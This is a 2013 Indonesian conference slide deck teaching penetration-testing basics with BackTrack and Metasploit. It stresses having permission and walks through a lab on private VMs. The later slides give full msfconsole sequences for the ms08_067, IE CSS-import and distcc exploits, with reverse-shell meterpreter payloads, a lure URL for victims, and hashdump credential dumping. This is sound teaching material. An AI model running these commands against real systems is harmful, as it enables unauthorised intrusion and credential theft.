PENETRATION TESTING AND METASPLOIT BASIC Presented by Syarif Indonesia Creative Open Source Software ( ICrOSS ) 2013 Jakarta, April 25 2013 Balai Kartini
PENETRATION TESTING AND METASPLOIT BASIC
Presented by Syarif
!Indonesia Creative Open Source Software ( ICrOSS ) 2013
Jakarta, April 25 2013 Balai Kartini
Agenda
• Why & What’s Penetration Testing ( Pentest )
• << back|track basic overview
• Information Gathering & Port Scan ( Demo)
• Metasploit Basics & Meterpreter
• Challenge ;)
Whoami
• Just me my self : http://fl3x.us ; @fl3xu5
• InfoSec Enthusiast & Trainer
• Lecture & Assistant Manager
• CyberCrime Investigator
Why Pentest ?
• Millions of dollars have been invested in security programs to protect critical infrastructure to prevent data breaches *1)
• Penetration Test is one of the most effective ways to identify weaknesses and deficiencies in these programs *1)
What’s Penetration Testing
• A method to evaluate the security of computer system / network
• Practice ( attacking ) an IT System like a ‘hacker’ does
• Find security holes ( weaknesses )
• Bypass security mechanism
• Compromise an organization’s IT system security
Must have permission from IT system owner !
illegal activity put you in Jail
Ethics
• Think before act
• Don’t be stupid
• Don’t be malicious
Pentest Phases
Vulnerability Analysis
Information Gathering
Exploitation
Post Exploitation
Reporting
<< back|track overview
• .
The Most Advanced Linux Security Distribution
Open Source & Always be
Developed for Security Professional
Real World Pentesting Tools
<< back|track overview
• Watch the Video ! :)
<< back|track overview
<< back|track overview
What’s
• Not just a tool, but an entire framework *1)
• an Open source platform for writing security tools and exploits *2)
• Easily build attack vectors to add its exploits, payloads, encoders,
• Create and execute more advanced attack
• Ruby based
Metasploit interfaces
• MSFconsole
• MSFcli
• msfweb, msfgui ( discontinued )
• Metasploit Pro, Metasploit Express
• Armitage
MSFconsole
MSFcli
Metasploit Terminology
• Exploit : code that allow a pentester take some advantages of a flaw within system,application, or service *1)
• Payload : code that we want the target system to execute ( few commands to be executed on the target system ) *1)
• Shellcode : a set of instructions used as payload when exploitation occurs *1)
• Module : a software that can be used by metasploit *1)
• Listener : a component for waiting an incoming connection *1)
How does exploitation works
attacker
exploit + payload
vulnerable server
1
exploit run , then payload run2
3 Upload / Download data
Traditional Pentest Vs Metasploit
Public Exploit Gathering
Change offsets
Replace ShellCode
Load Metasploit
Choose the target OS
Use exploit
SET Payload
Execute
Traditional Pentest Metasploit for Pentest
Meterpreter
• as a payload after vulnerability is exploited *1)
• Improve the post exploitation
Meterpreter
Exploiting a vulnerability
Select a meterpreter as a payload
meterpreter shell
Meterpreter command
Meterpreter command
Meterpreter command
Meterpreter command
Meterpreter command
Pentest Scenario
attacker vulnerable OS on VMware
* : Ubuntu 8.04 metasploitable
*
Pentest Skenario
• Set network adapter : NAT
• Firewall & Windows update : OFF
• Fresh OS installed
!
• startx
OS in the Lab• BackTrack 5 R 3
• IP address : 172.16.150.169
• Windows Xp SP 2
• IP address : 172.16.150.165
• Windows 2003 Server
• IP address : 172.16.150.167
• Windows 7
• IP address : 172.16.150.170
• Ubuntu Linux 8.04 ( Metasploitable )
• IP address : 172.16.150.171
Windows XP Exploitation
• msf > search windows/smb
• msf > info exploit/windows/smb/ms08_067_netapi
• msf > use exploit/windows/smb/ms08_067_netapi
• msf exploit(ms08_067_netapi) > show payloads
• msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
• msf exploit(ms08_067_netapi) > show options
• msf exploit(ms08_067_netapi) > set RHOST 172.16.150.165
• msf exploit(ms08_067_netapi) > set LHOST 172.16.150.169
• msf exploit(ms08_067_netapi) > show options
• msf exploit(ms08_067_netapi) > exploit
• meterpreter > background
• session -l
Windows XP Post Exploitation
• session -i 1
• meterpreter > getsystem -h
• getuid
• hashdump
Windows 2003 Server Exploitation
• msf > search windows/smb
• msf > info exploit/windows/smb/ms08_067_netapi
• msf > use exploit/windows/smb/ms08_067_netapi
• msf exploit(ms08_067_netapi) > show payloads
• msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
• msf exploit(ms08_067_netapi) > show options
• msf exploit(ms08_067_netapi) > set RHOST 172.16.150.167
• msf exploit(ms08_067_netapi) > set LHOST 172.16.150.169
• msf exploit(ms08_067_netapi) > show options
• msf exploit(ms08_067_netapi) > exploit
• meterpreter > background
• session -l
Windows 7 Exploitation• msf > use exploit/windows/browser/ms11_003_ie_css_import
• msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp
• msf exploit(ms11_003_ie_css_import) > show options
• msf exploit(ms11_003_ie_css_import) > set SRVHOST 172.16.150.169
• msf exploit(ms11_003_ie_css_import) > set SRVPORT 80
• msf exploit(ms11_003_ie_css_import) > set URIPATH miyabi-hot.avi
• msf exploit(ms11_003_ie_css_import) > set LHOST 172.16.150.169
• msf exploit(ms11_003_ie_css_import) > set LPORT 443
• msf exploit(ms11_003_ie_css_import) > exploit
Just wait until the victim open the url http://172.16.150.169:80/miyabi-hot.avi
Windows 7 Exploitation
• msf exploit(ms11_003_ie_css_import) > sessions -l
• msf exploit(ms11_003_ie_css_import) > sessions -i 1
• meterpreter > sysinfo
• meterpreter > shell
Ubuntu 8.04 Metasploitable Exploitation
• search distcc
• use exploit/unix/misc/distcc_exec
• show payloads
• set PAYLOAD cmd/unix/reverse
• show options
• set rhost 172.16.150.171
• set lhost 172.16.150.169
• exploit
Greet & Thanks To
• BackTrack Linux
• Metasploit Team ( HD Moore & rapid7 )
• Offensive Security / Metasploit Unleashed
• David Kennedy
• Georgia Weidman
References !
!
• 1. Metasploit The Penetration Tester’s Guide : David Kennedy , Jim O’Gorman, Devon Kearns, Mati Aharoni
• 2. http://www.metasploit.com
• 3. http://www.offensive-security.com/metasploit-unleashed/Main_Page
• 4. http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines
Challenge in 45 minutes :)
• Connect Your Windows OS to TP LINK Access Point over dhcp
• BackTrack 5R3 VMWare setting :
• Network adapter : Bridge
• Get 4 Pictures by your self & shutdown the targets ( if you can :p )
• Win the Polo T-Shirt indobacktrack
Challenge in 45 minutes :)